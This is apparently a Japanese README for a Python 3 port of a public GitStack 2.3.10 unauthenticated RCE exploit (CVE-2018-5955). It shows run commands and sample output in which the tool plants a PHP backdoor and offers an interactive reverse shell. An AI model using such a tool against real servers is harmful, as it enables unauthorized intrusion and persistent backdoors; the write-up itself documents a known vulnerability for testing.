CVE 2018 5955
1.0.0
CVE-2018-5955 GitStack 2.3.10の承認のないRCEのエクスプロイト
エクスプロイト:GitStack 2.3.10認定されていないリモートコード実行
日付:18.01.2018
ソフトウェアリンク:https://gitstack.com/
エクスプロイト著者:Kacper Szurek
オリジナルのエクスプロイト:https://www.exploit-db.com/exploits/43777
ウェブサイト:https://security.szurek.pl/
カテゴリ:リモート
CVE:CVE-2018-5955
日付:23.06.2023
新機能:インタラクティブなRCE、OS検出、リバースシェル機能、Python2からPython3に適合
CVE:CVE-2018-5955
カテゴリ:リモート
私はあなたの行動について責任を負いません。教育目的のためにGitHubに投稿したか、認定された認定された侵入テストのためにそれを投稿しました
要件をインストールする:
pip install colorama
次に、次のように実行できます。
python3 exploit.py
OSはCVEを悪用した後に検出されます。実際、この出力ラインがあります。
[+] Get user list
[+] Found user twreath
[+] Web repository already enabled
[+] Get repositories list
[+] Found repository Website
[+] Add user to repository
[+] Disable access for anyone
[+] Create backdoor in PHP
[*] Type 'shell' to get a reverse shell
[*] OS : Windows <----
「OS」と入力して、オペレーティングシステムの種類を見つけることもできます
ターゲットに実際のリバースシェルを取得するには、「シェル」と入力してから、このようなリッスンポートを入力できます。
RCE > shell
[?] Please enter the IP address for the shell: YOUR IP HERE
[?] Please enter the port number for the shell: YOUR LISTEN PORT HERE